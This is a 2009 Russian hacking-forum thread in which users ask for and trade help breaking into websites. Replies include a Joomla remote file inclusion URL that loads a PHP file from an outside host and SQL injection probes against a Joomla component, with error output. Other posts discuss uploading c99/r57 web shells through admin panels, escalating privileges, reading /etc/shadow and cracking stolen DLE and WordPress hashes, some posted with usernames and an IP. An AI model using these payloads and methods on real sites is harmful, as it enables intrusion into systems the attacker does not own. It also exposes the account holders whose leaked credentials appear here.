[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это не cms, а форум. Целая тема по уязвимостям есть http://forum.antichat.ru/thread89112.html.
     
  2. SaFiK

    SaFiK New Member

    Joined:
    11 May 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Люди, кто знает уязвимости на файлообменнике Letitbit ? можно ли его ломануть ?
     
  3. Failure

    Failure Elder - Старейшина

    Joined:
    21 Sep 2008
    Messages:
    179
    Likes Received:
    46
    Reputations:
    16
    топором по серверу, может и ломонешь, если ты о обходе таймера - юзай прокси или плагин (уже 100 лет как есть) что бы сразу показывало ссылку на скачивание
    если ты про такие вещи как дефейс, от скажу: ололо
     
  4. reega

    reega New Member

    Joined:
    13 Dec 2008
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    Можно ли узнать текущий пароль пользователя на сайте с движком DLE 8 версии???
    доступ к базе вроде получил, скачал. зашифрованый пароль где то тут:

    'e7e4806514adfd4171437dfd51f9e495', 'eric', 4, 0, 1, 3, '1241397821', '1240442341', '', 1, '', '', '', '', '', '', '', 0, 0, '', '', '', '', '194.186.188.36', 0, 0, ''),

    кто умеет отпишите в личку. или сюда способ.
     
  5. Alfer

    Alfer Member

    Joined:
    23 Jul 2008
    Messages:
    24
    Likes Received:
    14
    Reputations:
    10
    Всеобщее здрасьте! Подскажите пожалуйста, есть форум на phpbb 2.0.5 версии, старыыый вхлам, админы уже наверное с 2005 года там нет, один модератор бедный трудится как может, кароче форум уже загибается, много чего уже не работает попросту, скажите, вот возможно как-нибудь узнать пасс админа. Ну точнее, способов много, но раз форум старый, какой будет самый простой и недолгий способ?
     
  6. Noker

    Noker New Member

    Joined:
    27 Oct 2008
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите рабочий эксплоит для версии Joomla 1.0.13.Или есть какие нибуть актуальные баги для этой версии?
     
    #146 Noker, 4 Jun 2009
    Last edited: 4 Jun 2009
  7. -=Razor=-

    -=Razor=- Member

    Joined:
    20 Dec 2008
    Messages:
    30
    Likes Received:
    29
    Reputations:
    3
    exploit:
    http://joomla/index.php?mosConfig_absolute_path=http://site.ru/php.txt
    Exploit: http://milw0rm.com/id.php?id=44
     
    1 person likes this.
  8. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Уязвимости джумлы больше зависят от компонентов которые в ней установлены чем от версии, имхо. ищи баги в компонентах.
     
  9. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Сижу ковыряю джумлу. Вродь как что то есть в модуле com_exitpoll.
    при запросе
    Code:
    index.php?option=com_exitpoll&task=results&id=1/**/order/**/by/**/1/*
     ошибок нет, слепой тоже вроди нету.
    при запросе
    Code:
    index.php?option=com_exitpoll&task=results&id=-1/**/order/**/by/**/1/*
     Выдаёт ошибку следующего вида 
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n , 1 , 0) AS shw_result\n FROM pros_exitpoll WHERE id=   далее поидее должен ити -1, но там кнопочка стоит и видать -1 просто невидно
    если это поможет вот этот эрор из исходника страницы
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\' at line 4 SQL=SELECT IF ((resfrom <= \'2009-06-09\' OR resfrom=\'0000-00-00 00:00:00\') AND\n								 		 (resto >= \'2009-06-09\' OR resto=\'0000-00-00 00:00:00\')\n								 		 , 1 , 0) AS shw_result\n								FROM pros_exitpoll WHERE id=<input class="button" type="button" value="Продолжить" onclick="window.history.go([B]-1[/B]);" />
    Собсно подскажите чё с этим можно сделать ибо я в потерях.
     
  10. AGRESOR

    AGRESOR New Member

    Joined:
    6 Jul 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Доброе время суток всем . Народ как залить шел через админку в dle 7.5 ?
     
  11. KaZ@NoVa

    KaZ@NoVa Elder - Старейшина

    Joined:
    5 Jul 2008
    Messages:
    368
    Likes Received:
    438
    Reputations:
    -16
    Если у хостига стоит антивир, то это бесполезно... так как шел в любой форме воспринимать как троян...
    А вообще попробуй его подгрузить как картинку если есть такая возможность..

    вот здесь искал??
    http://damagelab.org/lofiversion/index.php?t=16780
     
  12. MaXoH999

    MaXoH999 New Member

    Joined:
    6 Jun 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите, пожалуйста, как можно поменять chmod на сайтах, взломанных с помощью shellа? Мало, кто сейчас ставит права 777, тем более на главный файл index.php. Шелл (c99 или r57) заливаю с помощью уязвимостей, но практически ничего не могу сделать из-за прав, а права не хотят меняться. Может есть какой способ их поменять, может с помощью другой утилиты или шелла?
     
  13. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    MaXoH999 если с шеллом не хотять менятся права то иши какойнить сплоит рутовый!
     
  14. hookman

    hookman Member

    Joined:
    16 Feb 2009
    Messages:
    44
    Likes Received:
    10
    Reputations:
    0
    Подскажите как залить шел в админке mambo 4.0.14 Stable.
    мамботы, компоненты, модули... обично такип образом заливал, но в данной версии такого вообще нет.
     
  15. MaXoH999

    MaXoH999 New Member

    Joined:
    6 Jun 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    А ещё кроме этого есть какой-нибудь способ поменять права или узнать фтп логин и пароль?
    Хорошо и ещё...если я знаю логин и пароль к phpmyadmin, то с помощью этого как-нибудь рут-доступ можно поставить "гостю"?
     
  16. Dark_cracker

    Dark_cracker Member

    Joined:
    29 May 2009
    Messages:
    73
    Likes Received:
    8
    Reputations:
    1
    Ищи через шелл файлы-логи на серваке может там чё нить нароешь, и ещё посмотри этот файл etc/shadow (если есть права).
     
  17. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Как сбрутить хеши из WordPress'a ?
    На hashcracking.info пишет: Тип хеша неопределен!

    Code:
    nastenka:$P$BeNvbpquWaaYZX6ABx9utk0w98Arms1
    malina:$P$BMYngcoKyKOIClacElYGOQWPVJZoLN/
    SergioXII:$P$BGu3dg5kiEabt9sPLXYocMn8FanUhT1
    
     
  18. Dark_cracker

    Dark_cracker Member

    Joined:
    29 May 2009
    Messages:
    73
    Likes Received:
    8
    Reputations:
    1
    Через программы (passwordspro), брутом, у wordPress хеш + соль тебе в этот раздел _http://forum.antichat.ru/thread46700.html
     
    #158 Dark_cracker, 16 Jun 2009
    Last edited: 16 Jun 2009
  19. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Подскажите как залить шелл через админку PsychoStats 2.3.3? Если конечно вообще возможно это :)
    P.S. Через скуль-инъекцию не вариант - отсутствует file_priv.
     
    #159 InFlame, 16 Jun 2009
    Last edited: 16 Jun 2009
    1 person likes this.
  20. KaZ@NoVa

    KaZ@NoVa Elder - Старейшина

    Joined:
    5 Jul 2008
    Messages:
    368
    Likes Received:
    438
    Reputations:
    -16
    а в админку доступ есть?
    кинь сайт какой нидь с этой байдой